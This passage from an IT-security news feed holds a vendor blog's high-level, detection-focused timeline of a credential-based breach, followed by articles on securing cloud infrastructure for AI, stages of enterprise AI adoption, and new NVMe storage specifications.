<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Hour 0–6: Initial Access</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>The attack begins when threat actors obtain valid credentials. These may originate from credential dumps, phishing campaigns, malware infections, or previously breached third-party services where employees reused passwords. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This growing underground economy is fueled by infostealer malware. According to CRIL, more than 50 active infostealer variants are currently circulating, continuously harvesting usernames, passwords, browser cookies, and session tokens that are later sold or shared among initial access brokers and ransomware affiliates.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Because the credentials are legitimate, attackers frequently bypass traditional perimeter defenses without triggering immediate alarms. Instead of exploiting software vulnerabilities, they simply log in using valid accounts. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading {"level":3} --></p>
<h3 class="wp-block-heading"><strong>Detection Opportunity</strong> </h3>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Security teams should monitor for: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Logins from unfamiliar geographic locations </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Impossible travel events </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Access attempts from anonymous VPNs or Tor exit nodes </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Repeated authentication failures followed by a successful login </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>The earlier abnormal authentication behavior is identified, the greater the chance of preventing further compromise. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Hour 6–18: Establishing Persistence</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>After gaining access, attackers work to ensure they cannot be easily removed. They may register new authentication methods, create additional user accounts, modify MFA settings, or generate persistent API tokens. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Their goal is simple: maintain access even if the original password is reset. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Attackers also spend this period quietly learning about the environment, identifying high-value systems, and understanding privilege structures. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading {"level":3} --></p>
<h3 class="wp-block-heading"><strong>Detection Opportunity</strong> </h3>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Security teams should investigate: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Unexpected MFA changes </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Newly created privileged accounts </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Unauthorized mailbox rules </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Suspicious administrative activities </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Changes to identity or authentication configurations </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>At this stage, seemingly minor administrative changes often provide the earliest indicators of malicious persistence. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Hour 18–36: Privilege Escalation and Internal Reconnaissance</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>With persistence established, attackers begin expanding their access. They enumerate Active Directory environments, identify privileged users, scan internal assets, and search for sensitive repositories. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Rather than acting aggressively, experienced adversaries move deliberately to avoid detection. Their objective is to understand the organization's architecture before executing the next phase. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This reconnaissance often reveals domain administrators, backup infrastructure, cloud resources, financial systems, and critical databases. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading {"level":3} --></p>
<h3 class="wp-block-heading"><strong>Detection Opportunity</strong> </h3>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Organizations should monitor for: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Unusual privilege escalation attempts </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Excessive directory queries </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Credential dumping activities </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>PowerShell abuse </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Administrative tools running outside normal operating hours </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>This phase represents one of the strongest opportunities to stop attackers before they reach mission-critical assets. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Why Early Visibility Matters</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Attackers rarely begin with privileged accounts—they build toward them. <strong><a href="https://cyble.com/solutions/dark-web-monitoring/">Cyble's Dark Web Monitoring</a></strong> helps organizations detect leaked employee credentials, exposed corporate identities, and compromised accounts circulating across dark web ecosystems.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Hour 36–60: Lateral Movement</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Once sufficient privileges have been acquired, attackers begin moving across the environment. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Using legitimate remote administration tools, stolen session tokens, or harvested credentials, they access additional endpoints, servers, and cloud workloads. Their movements are intentionally designed to blend into normal administrative activity. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>During this stage, attackers identify the systems that contain the organization's most valuable information. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading {"level":3} --></p>
<h3 class="wp-block-heading"><strong>Detection Opportunity</strong> </h3>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Security teams should watch for: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Remote administrative connections between unusual hosts </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Sudden authentication activity across multiple systems </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Unexpected access to file servers </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Abnormal service account usage </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Large volumes of internal network scanning </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>Behavioral anomalies become increasingly valuable indicators during lateral movement because attackers are using valid identities rather than malware. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Hour 60–72: Data Exfiltration and Business Impact</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>The final stage is where financial and operational damage occurs. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Sensitive customer information, intellectual property, financial records, and confidential business documents are collected and transferred outside the organization. In many cases, ransomware deployment follows immediately afterward to maximize leverage during extortion. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>At this point, containment becomes significantly more expensive, investigations become more complex, and regulatory reporting obligations often begin. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading {"level":3} --></p>
<h3 class="wp-block-heading"><strong>Detection Opportunity</strong> </h3>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Security teams should prioritize alerts involving: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Large outbound data transfers </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Connections to unfamiliar cloud storage services </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Compression and archiving of sensitive files </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Encryption activity across multiple endpoints </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Unexpected privilege changes immediately before data movement </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>By this stage, every hour of delayed detection substantially increases business risk and recovery costs. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Why Speed Determines the Outcome</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Credential-based attacks are no longer slow-moving campaigns that unfold over weeks. Modern adversaries automate credential validation, privilege escalation, and reconnaissance, allowing them to compromise environments in less than three days. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This compressed timeline leaves security teams with only a handful of meaningful opportunities to detect and interrupt malicious activity. While strong authentication controls remain essential, organizations also need visibility beyond their own networks. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Monitoring the dark web for exposed credentials provides an opportunity to act before attackers ever attempt to authenticate. Combined with proactive identity monitoring and rapid incident response, early intelligence can dramatically reduce the likelihood of a successful credential-based breach. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Cyble's Dark Web Monitoring enables organizations to identify leaked employee credentials, monitor underground criminal ecosystems, and receive timely alerts when corporate identities appear in <a href="https://cyble.com/knowledge-hub/top-10-dark-web-forums/" target="_blank" rel="noreferrer noopener">dark web forums</a>, marketplaces, and breach repositories. This proactive visibility empowers security teams to remediate exposed accounts before they become the first step in a 72-hour compromise. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Book a <a href="https://cyble.com/request-demo/" target="_blank" rel="noreferrer noopener"><strong>personalized demo </strong></a>today to see how Cyble helps security teams uncover credential exposure across the dark web, prioritize risks, and respond faster to new threats. </p>
<p><!-- /wp:paragraph --></p>
<p>The post <a rel="nofollow" href="https://cyble.com/blog/72-hour-timeline-credential-based-cyberattack/">From Stolen Credentials to Full Breach: The 72-Hour Timeline</a> appeared first on <a rel="nofollow" href="https://cyble.com/">Cyble</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How Enterprises Can Scale AI Securely with the Right Cloud Foundation]]></title>
<description><![CDATA[Amarbir Singh, Senior Director – AI & Cloud Solutions, AHEAD

Building a secure cloud foundation for AI has become a top priority as enterprises move quickly to put AI at the center of how they operate. However, the rush to adopt AI is also reshaping the security agenda. The World Economic Foru...]]></description>
<link>https://tsecurity.de/de/3705681/it-security-nachrichten/how-enterprises-can-scale-ai-securely-with-the-right-cloud-foundation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3705681/it-security-nachrichten/how-enterprises-can-scale-ai-securely-with-the-right-cloud-foundation/</guid>
<pubDate>Wed, 05 Aug 2026 13:56:27 +0200</pubDate>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Secure-Cloud-Foundation-for-AI.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Secure Cloud Foundation for AI" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Secure-Cloud-Foundation-for-AI.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Secure-Cloud-Foundation-for-AI-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Secure-Cloud-Foundation-for-AI-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Secure-Cloud-Foundation-for-AI-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Secure-Cloud-Foundation-for-AI-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Secure-Cloud-Foundation-for-AI-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Secure-Cloud-Foundation-for-AI-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Secure-Cloud-Foundation-for-AI-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Secure-Cloud-Foundation-for-AI.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Secure-Cloud-Foundation-for-AI-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Secure-Cloud-Foundation-for-AI-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Secure-Cloud-Foundation-for-AI-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Secure-Cloud-Foundation-for-AI-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Secure-Cloud-Foundation-for-AI-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Secure-Cloud-Foundation-for-AI-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Secure-Cloud-Foundation-for-AI-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="How Enterprises Can Scale AI Securely with the Right Cloud Foundation 1"></p><strong><span><em>Amarbir Singh, Senior Director – AI &amp; Cloud Solutions, AHEAD</em></span></strong>

Building a secure cloud foundation for AI has become a top priority as enterprises move quickly to put AI at the center of how they operate. However, the rush to adopt AI is also reshaping the security agenda. The World Economic Forum’s Global Cybersecurity Outlook 2026 <a href="https://www.weforum.org/publications/global-cybersecurity-outlook-2026/" target="_blank" rel="nofollow noopener">finds</a> that 94 percent of organizations now see AI as the most significant driver of change in cybersecurity this year, while the share with processes in place to assess AI tools before deployment has risen from 37 percent to 64 percent.

That is an encouraging sign. It suggests enterprises are beginning to match AI ambition with stronger assurance. The challenge now is to build the secure, scalable cloud foundation that allows this progress to continue without creating more <a class="wpil_keyword_link" title="risk" href="https://thecyberexpress.com/what-are-risks-in-cybersecurity/" data-wpil-keyword-link="linked" data-wpil-monitor-id="29258">risk</a> and complexity.
<h3><strong>Why a Secure Cloud Foundation for AI Matters More Than Ever</strong></h3>
Too often, enterprises make that job harder for themselves. Attackers tend to work with discipline. They standardize, repeat and refine. Enterprises often do the opposite. They add tools, customize around every edge case and accumulate exceptions until their environments become harder to understand and harder to defend. In that kind of estate, every new control can create another blind spot.

Building a secure cloud foundation for AI is not just about adding capability. It is about reducing unnecessary complexity, improving visibility and making deliberate choices about what truly needs to be there.

That matters because many organizations are now stuck between urgency and overload. The market moves fast, threat categories keep shifting and new frameworks and vendors appear almost every week. In that environment, hesitation can feel prudent, but it often becomes the bigger risk. <a href="https://thecyberexpress.com/tce-weekly-roundup-jul-10/" target="_blank" rel="noopener">Security</a> and cloud leaders do not need perfect certainty before they move.

They need a clear direction, a practical operating model and the discipline to iterate. The era of fixed multi-year plans is giving way to shorter roadmaps that can adapt as the threat landscape changes. Progress now matters more than perfection.
<h3><strong>Moving Beyond Traditional Security Operating Models</strong></h3>
This is where traditional execution models begin to fall short. Annual policy reviews, slow approval chains and static response plans were built for a slower world. They are poorly suited to a landscape where AI adoption, <a class="wpil_keyword_link" title="cyber" href="https://thecyberexpress.com/cyber-news/" data-wpil-keyword-link="linked" data-wpil-monitor-id="29255">cyber</a> risk and business priorities can all shift within a quarter. <a class="wpil_keyword_link" title="Security" href="https://thecyberexpress.com/" data-wpil-keyword-link="linked" data-wpil-monitor-id="29257">Security</a> cannot function as a document that gets reviewed once a year. It has to function as a living operating model across the business. That means decisions happen faster, ownership is clearer and <a class="wpil_keyword_link" title="incident response" href="https://cyble.com/knowledge-hub/what-is-incident-response/" target="_blank" rel="noopener" data-wpil-keyword-link="linked" data-wpil-monitor-id="29254">incident response</a> is tested often enough that teams know what to do when pressure is real.

The shift that matters most is a shift from tools to outcomes. Security maturity is still too often measured by how much technology has been bought rather than what risk has actually been reduced. But tools are inputs, not outcomes. What matters is faster patching, lower exposure, stronger identity controls, clearer accountability and a more resilient business. <a class="wpil_keyword_link" title="Vulnerability management" href="https://cyble.com/solutions/vulnerability-management/" target="_blank" rel="noopener" data-wpil-keyword-link="linked" data-wpil-monitor-id="29253">Vulnerability management</a> should reduce the attack surface. Identity controls should let a distributed workforce operate safely and consistently. Resilience architecture should protect the services the business truly depends on. If a control does not support a meaningful outcome, its value should be questioned.

The same logic applies to cloud foundations in the AI era. Resilience should be designed around actual business need, not assumed as an abstract virtue. Some applications justify multi-region or even multi-provider architectures. Others do not. Building beyond the point of business need adds cost and complexity without adding meaningful protection. The stronger approach is to calibrate resilience to risk, not to fashion.

Identity is equally central. A zero trust model anchored in strong identity, multifactor authentication and disciplined access controls gives enterprises a consistent way to secure users, workloads and <a class="wpil_keyword_link" title="data" href="https://thecyberexpress.com/what-is-data/" data-wpil-keyword-link="linked" data-wpil-monitor-id="29256">data</a> across environments. At the same time, visibility and observability have to improve. Enterprises need to know where data is moving, where AI is being used and where new dependencies are emerging. Without that visibility, governance becomes reactive. With it, governance becomes an enabler of safe adoption rather than a brake on progress.
<h3><strong>Using AI to Improve Security Without Replacing Human Judgment</strong></h3>
AI itself should be part of this foundation, but not as a substitute for judgement. Used well, it can improve efficiency, accelerate detection and help teams manage growing operational demands. But people still need to stay firmly in the loop. The goal is not automation for its own sake. The goal is better decisions, faster response and stronger control in an environment that is only getting more dynamic.

The enterprises that scale AI securely will not be the ones that chase every new tool or wait for the market to settle. They will be the ones that simplify where they can, standardize where it matters and build cloud foundations that are governed, observable and designed around business outcomes. In the AI era, trust will depend less on how loudly an organization talks about innovation and more on whether it has built the foundations to sustain it securely at scale.]]></content:encoded>
</item>
<item>
<title><![CDATA[The 5 stages of AI adoption maturity: Where businesses create real value]]></title>
<description><![CDATA[Most enterprises are rushing toward autonomous AI. They shouldn’t. Autonomy you haven’t earned doesn’t speed you up. In fact, it slows you down.



Here’s what I’ve moved our organization toward: a five-stage set of AI adoption maturity benchmarks. It’s a practical framework for understanding whe...]]></description>
<link>https://tsecurity.de/de/3705650/it-security-nachrichten/the-5-stages-of-ai-adoption-maturity-where-businesses-create-real-value/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3705650/it-security-nachrichten/the-5-stages-of-ai-adoption-maturity-where-businesses-create-real-value/</guid>
<pubDate>Wed, 05 Aug 2026 13:50:10 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Most enterprises are rushing toward autonomous AI. They shouldn’t. Autonomy you haven’t earned doesn’t speed you up. In fact, it slows you down.</p>



<p class="wp-block-paragraph">Here’s what I’ve moved our organization toward: a five-stage set of AI adoption maturity benchmarks. It’s a practical framework for understanding where employee development, decision-making and business value intersect. Each stage provides value for your organization. Some roles and functions may only ever reach Stage 1 or 2, while others should be fast-tracked to Stage 5. By understanding this progression, leadership can stop viewing AI as a tool for task delegation and treat it as a catalyst for developing stronger, more decisive and more valuable teams.</p>



<h2 class="wp-block-heading">Stage 1: Research assistance</h2>



<p class="wp-block-paragraph">You hand people a premium ChatGPT account. Employees stop Googling and start prompting. Their experience improves: no ads, paragraph-form answers instead of blue links. But the underlying dynamic hasn’t changed. Output quality depends on input quality. A vague Google search returns a mess of links. A vague ChatGPT prompt returns a well-formatted mess of paragraphs. If your team didn’t know how to ask a precise question before, they still don’t.<br>           <br>The real danger at Stage 1 isn’t the bad answers – it’s the <a href="https://link.springer.com/article/10.3758/s13421-025-01755-4">confident-sounding</a> ones. A hallucinated statistic arrives in the same calm, authoritative prose as an accurate one. Teams that don’t verify sources in Google don’t suddenly fact-check ChatGPT. Before moving to Stage 2, your team needs to develop the instinct to ask, “How do I know this is true?”</p>



<h2 class="wp-block-heading">Stage 2: Task assistance</h2>



<p class="wp-block-paragraph">The next stage uses AI tools to complete tasks. It starts simply: “I need to write this email,” or “Make a spreadsheet to track open items.”</p>



<p class="wp-block-paragraph">The average employee takes what AI produces and passes it off without revision. At best, their efforts pass muster, with only a dash of <a href="https://hbr.org/2025/09/ai-generated-workslop-is-destroying-productivity">workslop</a>. At worst, the flood of unchecked AI outputs creates rework for teammates and clients.</p>



<p class="wp-block-paragraph">Another employee further along in Stage 2 may augment what AI produces. That impulse serves them well. But if they default to editing AI output rather than dictating the rules for what AI should produce, they can easily spend more time editing AI’s work than creating work from scratch.</p>



<p class="wp-block-paragraph">For employees whose work will largely remain in Stage 2, the focus should be on writing more precise prompts. The instinct to edit AI output isn’t wrong. The problem arises when the prompt is a rough starting point rather than a detailed spec. AI cares that your instructions are clear, specific and unambiguous. Get the spec right up front.</p>



<h2 class="wp-block-heading">Stage 3: Workflow integration</h2>



<p class="wp-block-paragraph">My daughter’s class recently had an assignment: write a paper on the causes of the Civil War.</p>



<p class="wp-block-paragraph">Her teacher knew what was going to happen. Every 11-year-old would go home and use ChatGPT to write a five-paragraph essay. So, she changed the exercise. The class generated and printed out the essay. Then, the teacher explained how to annotate, how to ask follow-up questions and how to revise in ChatGPT using the marked-up draft.<br><br>The same three-step sequence — assemble context, build the prompt, edit hard — applies when someone writes a post-mortem. The temptation is to skip straight to the draft. Pull the incident data, ask Gemini for a timeline and root cause analysis, clean it up, get a quick peer review and send it.<br><br>An engineer working at Stage 3 does what the teacher did. First, they assemble context: the Slack thread where someone flagged the anomaly two hours before the alert fired, the Jira ticket, the gap in monitoring that nobody documented. Then they build a prompt that reflects the full context and generate a draft. Now the red pen comes out: push back on the root cause analysis, add the institutional context Gemini couldn’t know, tighten the remediation steps until they’re actionable.</p>



<p class="wp-block-paragraph">The result is a better document — and an engineer who understands what failed and builds a better repeatable process. Saving time on a first draft is a fine side effect. The goal is to produce a final draft that’s worthy of review.</p>



<h2 class="wp-block-heading">Stage 4: Guided automation</h2>



<p class="wp-block-paragraph">The fourth stage is where collaboration becomes self-sustaining. You’re no longer asking AI to help you do a task. You’re asking it to run the task and surface the decisions that require your judgment.</p>



<p class="wp-block-paragraph">My LinkedIn workflow is a good example of what this looks like in practice.</p>



<p class="wp-block-paragraph">A couple of years ago, I would read an article, develop a point of view, write two or three paragraphs and publish. Not bad, but dependent on me having the time and cognitive bandwidth.</p>



<p class="wp-block-paragraph">The friction was the 15 decisions that came before drafting: Which angle is worth pursuing? Does this use my voice? Have I said this before?</p>



<p class="wp-block-paragraph">So, I started researching my patterns. First, I fed Claude my prior LinkedIn posts and prompted it to analyze my tone, sentence patterns and structural habits. I didn’t ask it to “describe my voice” – that gets you a paragraph of flattering generalities. This analysis became the base layer of the tool.</p>



<p class="wp-block-paragraph">Then I added a second layer: LinkedIn-specific rules and AI writing patterns to avoid. That context got embedded alongside the voice analysis.</p>



<p class="wp-block-paragraph">Now the workflow runs like this. I click a link, save the article, highlight and annotate the sections that interest me. My Claude Managed Agent picks up the annotation, infers what I found worth engaging with and writes four drafts with meaningfully different angles on the source material. It compares each draft against my post history and proposes two. I read the proposals, pick one, edit and authorize publication with Buffer.<br><br>The automation didn’t remove my judgment from the process. It freed me from work that didn’t depend on judgment. Now I do the work that matters: deciding what to say, identifying patterns and sharing my point of view.</p>



<p class="wp-block-paragraph">That shift in what I’m accountable for is where the ROI changes. The value isn’t in the time saved on any single post. It’s that the workflow no longer depends on me having the bandwidth to start from zero. The capacity was always there; the system makes it consistent and repeatable.</p>



<h2 class="wp-block-heading">Stage 5: Full automation</h2>



<p class="wp-block-paragraph">The most advanced stage of maturity is when the system largely runs on its own. You’re no longer managing step-by-step actions; you’re defining goals, setting guardrails and measuring outcomes.</p>



<p class="wp-block-paragraph">We have one running in our engineering org right now. When a ticket gets escalated from our support team to engineering, the agent triages it and routes it to the team responsible for the fix. When an engineering manager reassigns the ticket – because the routing was wrong – the agent picks up that correction, feeds it back into its prompt tooling and updates its model of who owns what. We’re now extending it further: the agent is learning which parts of the codebase need to change and which engineers are likely to own the fix.</p>



<p class="wp-block-paragraph">There’s a critical catch: this stage only works if you’ve earned your way there. We learned this firsthand. When we first rolled out the routing agent, we used a static map of application areas to engineering teams and assumed that was enough. It wasn’t. We couldn’t reliably distinguish front-end bugs from back-end ones, so the front-end team kept getting tickets caused by a misbehaving API. Features were split between teams in ways the map didn’t capture — one team owned exports, another owned reports. Before the routing could work, the knowledge had to exist somewhere it could be used. An autonomous system is only as good as the foundation beneath it – the clarity of your workflows, the health of your data, the alignment of your teams. Deploy an autonomous agent into a broken process and you get bad results at scale. You cannot safely delegate what you don’t fully understand.</p>



<p class="wp-block-paragraph">This is why racing straight to Stage 5 often fails. You need to know what “good” output looks like (Stages 2 and 3) and how to orchestrate the pieces (Stage 4) before you can confidently take your hands off the wheel.</p>



<h2 class="wp-block-heading">Where business value emerges</h2>



<p class="wp-block-paragraph">The evolution from a premium search engine to an autonomous system is an organizational challenge, not a technology one. Realizing the <a href="https://www.cio.com/article/4157498/kpmg-report-finds-enterprise-disconnect-between-ai-and-its-roi.html">value of AI</a> is determined not by the sophistication of the underlying model, but by the maturity of the team wielding it.</p>



<p class="wp-block-paragraph">The practical move isn’t to audit your whole organization’s AI readiness. Start with one workflow. Push it one stage higher. Measure what changes. That’s how you find out if this matters in your specific context – not in theory, but in the work your team actually does.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[NVMe Polishes Its Specs, Brings Virtualization to Locally Attached SSDs]]></title>
<description><![CDATA[The latest NVMe specifications add SSD-level virtualization that can simplify live VM migration by preserving storage identities across servers. The updates also introduce support for post-quantum cryptography, controller-based rate limiting, voltage monitoring, and factory-reset capabilities. Th...]]></description>
<link>https://tsecurity.de/de/3705642/it-security-nachrichten/nvme-polishes-its-specs-brings-virtualization-to-locally-attached-ssds/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3705642/it-security-nachrichten/nvme-polishes-its-specs-brings-virtualization-to-locally-attached-ssds/</guid>
<pubDate>Wed, 05 Aug 2026 13:49:04 +0200</pubDate>
<content:encoded><![CDATA[The latest NVMe specifications add SSD-level virtualization that can simplify live VM migration by preserving storage identities across servers. The updates also introduce support for post-quantum cryptography, controller-based rate limiting, voltage monitoring, and factory-reset capabilities. The Register reports: Announced by the NVM Express consortium, all 11 of the suite of NVMe specs have been updated with new features and engineering change notices. These represent the next step in the evolution of the standard, it says, which was created as a protocol to support storage devices connected to a system's PCIe bus. Perhaps the most significant new capability is PCIe Exported NVM Subsystem Migration. This extends existing NVMe virtualization to locally-attached PCIe SSDs. It does this by abstracting the physical drives into host-defined virtualized NVM subsystems, to allow for virtual machine (VM) mobility without storage reconfiguration.
 
When a VM moves from one server to another, its storage also needs to move with it in a way that's non-disruptive to any applications running in that VM. "With NVM Subsystem Migration, NVMe SSDs can present exported NVM subsystems that hide the complexity of the underlying hardware," says Mike Allison, a senior director at SSD maker Samsung and NVM Express board member. "Instead of interacting with physical controllers and namespaces, the host only sees exported controllers and namespaces. This creates a clean separation between what the VM sees and what's happening under the hood," Allison explains on an NVM Express blog.
 
"One of the key innovations here is providing the host with control over exported identifiers. During migration, those identifiers can be carried over exactly from the source to the destination. That consistency is crucial: even if the underlying hardware uses different internal IDs, the VM sees no change and can pick up right where it left off with no storage reconfiguration required," he says. In effect, the NVMe layer now enables the virtual machine manager (VMM) to rely on virtualization built into the SSD. The flash drive itself exposes logical, virtualized storage constructs, offloading this complexity from the VMM. You can learn more about the updated NVMe specifications here.<p></p><div class="share_submission">
